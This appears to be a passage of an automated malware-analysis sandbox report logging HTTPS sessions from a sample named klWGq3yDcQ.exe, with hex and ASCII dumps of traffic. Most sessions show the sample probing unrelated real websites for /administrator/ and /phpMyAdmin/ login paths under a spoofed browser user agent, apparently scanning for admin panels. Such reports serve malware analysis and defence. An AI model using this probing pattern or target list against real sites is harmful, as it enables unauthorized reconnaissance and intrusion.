                                                                                                                                                                                                    2023-11-26 05:59:32 UTC188INData Raw: 65 67 61 72 64 6c 65 73 73 2c 20 77 65 20 72 65 63 6f 6d 6d 65 6e 64 20 79 6f 75 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 62 72 6f 77 73 65 68 61 70 70 79 2e 63 6f 6d 2f 22 3e 75 70 64 61 74 65 20 79 6f 75 72 20 62 72 6f 77 73 65 72 2e 3c 2f 61 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 76 65 72 69 66 69 63 61 74 69 6f 6e 20 2d 2d 3e 0a 3c 21 2d 2d 20 65 6e 64 20 76 65 72 69 66 69 63 61 74 69 6f 6e 20 2d 2d 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                    Data Ascii: egardless, we recommend you to <a href="http://browsehappy.com/">update your browser.</a></span> </div> </div></div>... verification -->... end verification --></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    93192.168.2.45680834.208.26.1524436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:32 UTC180OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: micro-design.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC411INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 32 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 50 48 50 2f 37 2e 34 2e 31 35 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 4c 69 6e 6b 3a 20 3c 68 74 74 70 73 3a 2f 2f 6d 69 63 72 6f 2d 64 65 73 69 67 6e 2e 63 6f 6d 2f 77 70 2d 6a 73 6f 6e 2f 3e 3b 20 72 65 6c 3d 22 68 74 74 70 73 3a 2f 2f 61 70 69
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:32 GMTServer: ApacheX-Powered-By: PHP/7.4.15Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://micro-design.com/wp-json/>; rel="https://api
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC6INData Raw: 32 30 30 30 0d 0a
                                                                                                                                                                                                    Data Ascii: 2000
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC8192INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 77 69 6e
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><meta name='robots' content='noindex, follow' /><script>win
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC6INData Raw: 32 30 30 30 0d 0a
                                                                                                                                                                                                    Data Ascii: 2000
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC8192INData Raw: 6e 74 65 6e 74 20 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 34 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 32 32 32 32 32 32 32 32 32 32 32 32 32 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 65 6d 3b 7d 68 32 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 36 36 36 36 36 36 36 36 36 36 36 36 37 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 35 65 6d 3b 7d 68 33 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 35 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 33 38 38 38 38 38 38 38 38 38 38 38 39 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 65 6d 3b 7d 68 34 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74
                                                                                                                                                                                                    Data Ascii: ntent h1{font-size:40px;font-size:2.2222222222222rem;line-height:1.4em;}h2,.entry-content h2{font-size:30px;font-size:1.6666666666667rem;line-height:1.25em;}h3,.entry-content h3{font-size:25px;font-size:1.3888888888889rem;line-height:1.2em;}h4,.entry-cont
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC6INData Raw: 32 30 30 30 0d 0a
                                                                                                                                                                                                    Data Ascii: 2000
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC8192INData Raw: 2e 35 65 6d 20 31 2e 35 65 6d 3b 6d 61 72 67 69 6e 3a 20 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 7d 2e 61 73 74 72 61 2d 63 61 72 74 2d 64 72 61 77 65 72 20 2e 61 73 74 72 61 2d 63 61 72 74 2d 64 72 61 77 65 72 2d 63 6f 6e 74 65 6e 74 20 2e 63 61 72 74 5f 69 74 65 6d 2e 65 64 64 5f 63 68 65 63 6b 6f 75 74 20 7b 70 61 64 64 69 6e 67 3a 20 31 65 6d 20 31 2e 35 65 6d 20 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 3b 7d 2e 61 73 74 72 61 2d 63 61 72 74 2d 64 72 61 77 65 72 20 2e 77 69 64 67 65 74 5f 73 68 6f 70 70 69 6e 67 5f 63 61 72 74 5f 63 6f 6e 74 65 6e 74 20 3e 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6d 69 6e 69 2d 63 61 72 74 5f 5f 65 6d 70 74 79 2d 6d 65 73 73 61 67 65
                                                                                                                                                                                                    Data Ascii: .5em 1.5em;margin: 0;text-align: center;}.astra-cart-drawer .astra-cart-drawer-content .cart_item.edd_checkout {padding: 1em 1.5em 0;text-align: center;margin-top: 0;}.astra-cart-drawer .widget_shopping_cart_content > .woocommerce-mini-cart__empty-message
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    94192.168.2.456827162.250.126.54436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:32 UTC179OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                    Host: mydirectlender.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC662INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 65 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 63 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 73 65 74 2d 63 6f 6f 6b 69 65 3a 20 70 62 69 64 3d 66 34 62 63 39 35 61 35 61 30 35 31 66 38 61 34 32 66 37 37 35 32 62 36 66 37 36 63 32 35 61 31 36 32 36 32 32 63 61 30 66 33 39 64 38 32 34 37 32 64 35 61 30 32 30 61 32 32 62 65 37 36
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundConnection: closeexpires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8set-cookie: pbid=f4bc95a5a051f8a42f7752b6f76c25a162622ca0f39d82472d5a020a22be76
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC706INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="http://gmpg.org/xfn/11"> <meta name='robots' content='noindex, nofollow' />
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC14994INData Raw: 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 57 65 62 53 69 74 65 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 6d 79 64 69 72 65 63 74 6c 65 6e 64 65 72 2e 63 6f 6d 2f 23 77 65 62 73 69 74 65 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 6d 79 64 69 72 65 63 74 6c 65 6e 64 65 72 2e 63 6f 6d 2f 22 2c 22 6e 61 6d 65 22 3a 22 53 74 61 67 69 6e 67 20 66 6f 72 20 4d 79 44 69 72 65 63 74 4c 65 6e 64 65 72 2e 63 6f 6d 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 44 69 72 65 63 74 20 4c 65 6e 64 65 72 73 2c 20 4c 4c 43 22 2c 22 70 75 62 6c 69 73 68 65 72 22 3a 7b 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 6d 79 64 69 72 65 63 74 6c 65 6e 64 65 72 2e 63
                                                                                                                                                                                                    Data Ascii: ext":"https://schema.org","@graph":[{"@type":"WebSite","@id":"https://mydirectlender.com/#website","url":"https://mydirectlender.com/","name":"Staging for MyDirectLender.com","description":"Direct Lenders, LLC","publisher":{"@id":"https://mydirectlender.c
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC16384INData Raw: 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 6d 69 64 6e 69 67 68 74 2d 67 72 61 64 69 65 6e 74 2d 62 61 63 6b 67 72 6f 75 6e 64 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6d 69 64 6e 69 67 68 74 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 73 6d 61 6c 6c 2d 66 6f 6e 74 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 73 6d 61 6c 6c 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 6d 65 64 69 75 6d 2d 66 6f 6e 74 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 76 61 72
                                                                                                                                                                                                    Data Ascii: set--gradient--electric-grass) !important;}.has-midnight-gradient-background{background: var(--wp--preset--gradient--midnight) !important;}.has-small-font-size{font-size: var(--wp--preset--font-size--small) !important;}.has-medium-font-size{font-size: var
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC4177INData Raw: 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 74 79 78 2d 73 69 64 65 62 61 72 20 63 6f 6c 2d 6d 64 2d 33 20 63 6f 6c 2d 31 32 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 73 65 61 72 63 68 2d 31 22 20 63 6c 61 73 73 3d 22 77 69 64 67 65 74 20 77 69 64 67 65 74 5f 73 65 61 72 63 68 22 3e 3c 66 6f 72 6d 20 72 6f 6c 65 3d 22 73 65 61 72 63 68 22 20 6d 65 74 68 6f 64 3d 22 67 65 74 22 20 69 64 3d 22 73 65 61 72 63 68 66 6f 72 6d 22 20 63 6c 61 73 73 3d 22 73 65 61 72 63 68 66 6f 72 6d 22 20 61 63 74 69 6f 6e 3d 22 68 74 74
                                                                                                                                                                                                    Data Ascii: </div> </div> </div> <div class="styx-sidebar col-md-3 col-12"> <div id="search-1" class="widget widget_search"><form role="search" method="get" id="searchform" class="searchform" action="htt


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    95192.168.2.45695134.240.130.54436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:32 UTC184OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: www.harasduberry.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC231INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 33 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 73 74 72 69 63 74 2d 74 72 61 6e 73 70 6f 72 74 2d 73 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 36 30 34 38 30 30 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:33 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-Encodingstrict-transport-security: max-age=604800Server: nginx
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC16153INData Raw: 31 66 33 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 66 72 2d 46 52 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 20 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 75 2e 6a 69 6d 63 64 6e 2e 63 6f 6d 2f 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 20 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 73 73 65 74 73 2e 6a 69 6d 73 74 61 74 69 63 2e 63 6f 6d 2f 22 20 63 72 6f 73 73 6f 72 69 67 69 6e
                                                                                                                                                                                                    Data Ascii: 1f37<!DOCTYPE html><html lang="fr-FR"><head> <meta charset="utf-8"/> <link rel="dns-prefetch preconnect" href="https://u.jimcdn.com/" crossorigin="anonymous"/><link rel="dns-prefetch preconnect" href="https://assets.jimstatic.com/" crossorigin
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC16384INData Raw: 76 61 75 78 20 c3 a0 20 76 65 6e 64 72 65 3c 2f 61 3e 3c 2f 6c 69 3e 3c 2f 75 6c 3e 3c 2f 6c 69 3e 3c 6c 69 0d 0a 31 66 66 32 0d 0a 20 69 64 3d 22 63 63 2d 6e 61 76 2d 76 69 65 77 2d 32 31 31 35 39 31 35 33 37 39 22 20 63 6c 61 73 73 3d 22 6a 6d 64 2d 6e 61 76 5f 5f 6c 69 73 74 2d 69 74 65 6d 2d 30 20 6a 2d 6e 61 76 2d 68 61 73 2d 63 68 69 6c 64 72 65 6e 22 3e 3c 61 20 68 72 65 66 3d 22 2f 69 6e 66 6f 73 2d 70 72 61 74 69 71 75 65 73 2d 70 61 72 2d 72 61 63 65 2f 22 20 64 61 74 61 2d 6c 69 6e 6b 2d 74 69 74 6c 65 3d 22 49 6e 66 6f 73 20 70 72 61 74 69 71 75 65 73 20 70 61 72 20 72 61 63 65 22 3e 49 6e 66 6f 73 20 70 72 61 74 69 71 75 65 73 20 70 61 72 20 72 61 63 65 3c 2f 61 3e 3c 73 70 61 6e 20 64 61 74 61 2d 6e 61 76 69 2d 74 6f 67 67 6c 65 3d 22 63 63
                                                                                                                                                                                                    Data Ascii: vaux vendre</a></li></ul></li><li1ff2 id="cc-nav-view-2115915379" class="jmd-nav__list-item-0 j-nav-has-children"><a href="/infos-pratiques-par-race/" data-link-title="Infos pratiques par race">Infos pratiques par race</a><span data-navi-toggle="cc
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC7295INData Raw: 6e 74 72 5c 75 30 30 66 34 6c 65 20 4a 69 6d 64 6f 5c 6e 5c 6e 4c 65 73 20 63 6f 6f 6b 69 0d 0a 31 63 35 32 0d 0a 65 73 20 64 65 20 63 6f 6e 74 72 5c 75 30 30 66 34 6c 65 20 4a 69 6d 64 6f 20 70 65 72 6d 65 74 74 65 6e 74 20 61 75 20 76 69 73 69 74 65 75 72 20 64 75 20 73 69 74 65 20 64 27 61 75 74 6f 72 69 73 65 72 20 6c 65 73 20 73 65 72 76 69 63 65 73 5c 2f 63 6f 6f 6b 69 65 73 20 73 5c 75 30 30 65 39 6c 65 63 74 69 6f 6e 6e 5c 75 30 30 65 39 73 20 65 74 20 65 6e 72 65 67 69 73 74 72 65 6e 74 20 6c 65 75 72 73 20 70 72 5c 75 30 30 65 39 66 5c 75 30 30 65 39 72 65 6e 63 65 73 20 65 6e 20 6d 61 74 69 5c 75 30 30 65 38 72 65 20 64 65 20 63 6f 6f 6b 69 65 73 2e 5c 6e 5c 6e 50 72 65 73 74 61 74 61 69 72 65 20 3a 5c 6e 4a 69 6d 64 6f 20 47 6d 62 48 2c 20 53
                                                                                                                                                                                                    Data Ascii: ntr\u00f4le Jimdo\n\nLes cooki1c52es de contr\u00f4le Jimdo permettent au visiteur du site d'autoriser les services\/cookies s\u00e9lectionn\u00e9s et enregistrent leurs pr\u00e9f\u00e9rences en mati\u00e8re de cookies.\n\nPrestataire :\nJimdo GmbH, S


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    96192.168.2.457055104.200.30.314436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:32 UTC237OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                    Host: edgewater.group
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://edgewater.group/administrator/
                                                                                                                                                                                                    2023-11-26 05:59:32 UTC164INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 32 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 39 36 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:32 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                    2023-11-26 05:59:32 UTC196INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    97192.168.2.456948159.203.32.44436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:32 UTC243OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                    Host: jamiesonmullin.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://jamiesonmullin.com/administrator/
                                                                                                                                                                                                    2023-11-26 05:59:32 UTC176INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 32 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 30 32 39 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:32 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 3029Connection: closeContent-Type: text/html; charset=UTF-8
                                                                                                                                                                                                    2023-11-26 05:59:32 UTC3029INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 2c 20 76 69 65 77 70 6f 72 74 2d 66 69 74 3d 63 6f 76 65 72 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e
